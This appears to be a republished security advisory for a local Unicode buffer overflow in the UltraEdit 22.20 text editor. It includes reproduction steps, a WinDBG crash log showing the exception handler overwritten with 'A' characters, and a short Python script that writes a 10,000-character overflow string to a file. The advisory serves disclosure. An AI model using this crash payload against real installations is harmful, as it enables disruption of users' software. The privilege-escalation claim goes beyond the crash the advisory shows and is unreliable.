UltraEdit 22.20 – Unicode Buffer Overflow Vulnerability

A classic local unicode buffer overflow vulnerability has been discovered in the official UltraEdit v22.20 software client. The vulnerability allows local attackers to gain higher system or access privileges by exploitation of a classic unicode buffer overflow vulnerability.

The vulnerability is located in the Menu -> project -> Options index files module. Local attackers with low- privilege system user account or restricted system privileges are able to compromise the local system by exploitation of a classic unicode buffer overflow vulnerability. The local attacker copies a specific byte size string to the options index files input to overflow the process and overwrite the registers like exc or eip. Thus allows the local attacker to takeover the system process of the software client to compromise the local system/server.

The security risk of the buffer overflow vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.3. Exploitation of the vulnerability requires a low privilege system user account and no user interaction. Successful exploitation of the local vulnerability results in system compromise by elevation of privileges via overwrite of the registers.

Vulnerable Module(s):
[+] Menu > Project > Options > Index Files (Input)

Product & Service Introduction:
===============================

UltraEdit by IDM is the ideal text, HTML and hex editor, and an advanced PHP, Perl, Java and JavaScript editor for programmers. UltraEdit is also an XML editor including a tree-style XML parser. An industry award winner, UltraEdit supports disk-based 64-bit file handling (standard) on both 32- and 64-bit Windows platforms.

(Copy of the Homepage: http://www.ultraedit.com/downloads/ultraedit_download.html)

Date of Discovery:
==================

2015-09-16

Exploitation Technique:
=======================

Local

Platfom Tested:
===============

Windows 7

Solution – Fix & Patch:
=======================

Restrict the Option > Index File input by size and allocate the memory to deny to overflow the process by interaction with the vulnerable input field.

Levels Risk :

Proof of Concept (PoC):
=======================

The local buffer overflow vulnerability can be exploited by local attackers with restricted system user account without user interaction. For security demonstration or to reproduce follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Install the software and start the client
2. Copy  the AAAA...string from bof.txt to clipboard
3. Run UltraEdit.exe
4. Go Menu -> project -> Options index files
5. Paste it the input AAAA....string and click Browse
6. Software will stable crash or shut down
7. Successful reproduce of the local buffer overflow vulnerability!

--- Debug Log (WinDBG) ---
eax=00000000 ebx=00000000 ecx=00410041 edx=77a372cd esi=00000000 edi=00000000
eip=00410041 esp=0024e284 ebp=0024e2a4 iopl=0         nv up ei pl zr na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
uedit32+0x10041:
00410041 0200            add     al,byte ptr [eax]          ds:0023:00000000=??
0:000> !exchain
0024e298: ntdll!RtlRaiseStatus+c8 (77a372cd)
0024ecf4: uedit32+10041 (00410041)
Invalid exception stack at 00410041
0:000> d 0024ecf4
0024ecf4  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0024ed04  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0024ed14  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0024ed24  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0024ed34  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0024ed44  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0024ed54  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.
0024ed64  41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  A.A.A.A.A.A.A.A.

PoC: Exploit Client v20.0.0
buffer = "A"*10000
file = open("bof.txt","w")
file.write(buffer)
file.close()
print "File Created"
print " Contact msk4@live.fr"

Soyez le premier à commenter

Poster un Commentaire

Votre adresse de messagerie ne sera pas publiée.


*